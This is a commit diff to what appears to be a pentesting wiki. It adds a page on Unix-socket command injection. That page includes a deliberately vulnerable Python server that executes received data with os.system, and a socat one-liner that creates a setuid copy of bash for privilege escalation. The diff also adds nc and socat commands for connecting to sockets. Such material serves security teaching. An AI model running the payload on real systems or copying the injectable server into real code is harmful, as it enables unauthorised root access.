GitBook: [master] 3 pages modified

SUMMARY.md

@@ -22,11 +22,12 @@
 * [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
   * [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md)
   * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md)
+  * [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md)
   * [Interesting Groups - Linux PE](linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md)
     * [lxd/lxc Group - Privilege escalation](linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md)
   * [NFS no\_root\_squash/no\_all\_squash misconfiguration PE](linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md)
-  * [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md)
   * [SSH Forward Agent exploitation](linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md)
+  * [Socket Command Injection](linux-unix/privilege-escalation/socket-command-injection.md)
   * [Payloads to execute](linux-unix/privilege-escalation/payloads-to-execute.md)
   * [Wildcards Spare tricks](linux-unix/privilege-escalation/wildcards-spare-tricks.md)
 * [Useful Linux Commands](linux-unix/useful-linux-commands/README.md)

linux-unix/privilege-escalation/README.md

@@ -438,6 +438,21 @@ If you **identify any writable socket** \(_now where are talking about Unix Sock
 netstat -a -p --unix
 ```
 
+### Raw connection
+
+```bash
+#apt-get install netcat-openbsd
+nc -U /tmp/socket  #Connect to UNIX-domain stream socket
+nc -uU /tmp/socket #Connect to UNIX-domain datagram socket
+
+#apt-get install socat
+socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type
+```
+
+**Exploitation example:**
+
+{% page-ref page="socket-command-injection.md" %}
+
 ### HTTP sockets
 
 Note that there may be some **sockets listening for HTTP** requests \(_I'm not talking about .socket files but about the files acting as unix sockets_\). You can check this with:

linux-unix/privilege-escalation/socket-command-injection.md

@@ -0,0 +1,46 @@
+# Socket Command Injection
+
+### Socket binding example with Python
+
+In the following example a **unix socket is created** \(`/tmp/socket_test.s`\) and everything **received** is going to be **executed** by `os.system`.I know that you aren't going to find this in the wild, but the goal of this example is to see how a code using unix sockets looks like, and how to manage the input in the worst case possible.
+
+{% code title="s.py" %}
+```python
+import socket
+import os, os.path
+import time
+from collections import deque    
+
+if os.path.exists("/tmp/socket_test.s"):
+  os.remove("/tmp/socket_test.s")    
+
+server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+server.bind("/tmp/socket_test.s")
+while True:
+  server.listen(1)
+  conn, addr = server.accept()
+  datagram = conn.recv(1024)
+  if datagram:
+    print(datagram)
+    os.system(datagram)
+    conn.close()
+```
+{% endcode %}
+
+**Execute** the code using python: `python s.py` and **check how the socket is listening**:
+
+```python
+netstat -a -p --unix | grep "socket_test"
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+unix  2      [ ACC ]     STREAM     LISTENING     901181   132748/python        /tmp/socket_test.s
+```
+
+**Exploit**
+
+```python
+echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s
+```
+
+
+